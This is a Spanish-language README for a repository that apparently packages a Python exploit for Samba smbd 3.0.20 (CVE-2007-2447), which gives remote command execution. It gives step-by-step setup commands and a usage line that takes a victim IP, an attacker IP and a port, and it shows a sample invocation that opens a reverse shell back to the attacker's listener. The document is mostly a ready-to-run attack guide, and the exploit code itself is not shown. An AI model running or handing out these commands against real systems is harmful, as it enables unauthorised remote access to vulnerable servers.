
Este repositorio contiene un exploit para Samba smbd 3.0.20 (CVE-2007-2447) que permite la ejecución remota de comandos mediante solicitudes SMB manipuladas.
Este exploit requiere Python 3 y algunas dependencias. Se recomienda configurar un entorno virtual antes de ejecutar el exploit.
Clonar el repositorio:
git clone https://github.com/your-repo/CVE-2007-2447.git
cd CVE-2007-2447
Crear un entorno virtual de Python:
python3 -m venv smb_env
source smb_env/bin/activate # Linux/macOS
(Los usuarios de Windows pueden activarlo usando: smb_env\Scripts\activate)
Instalar las dependencias necesarias:
pip install -r requirements.txt
Una vez configurado el entorno virtual, puedes ejecutar el exploit usando la siguiente sintaxis:
python3 CVE-2007-2447.py -t <TARGET_IP> -a <ATTACKER_IP> -p <PORT>
python3 CVE-2007-2447.py -t 192.168.1.100 -a 192.168.1.50 -p 4444
-t / --target: Dirección IP de la máquina objetivo (víctima).-a / --attacker: Dirección IP del listener del atacante.-p / --port: Puerto para establecer la conexión de reverse shell.Cuando hayas terminado, desactiva el entorno virtual usando:
deactivate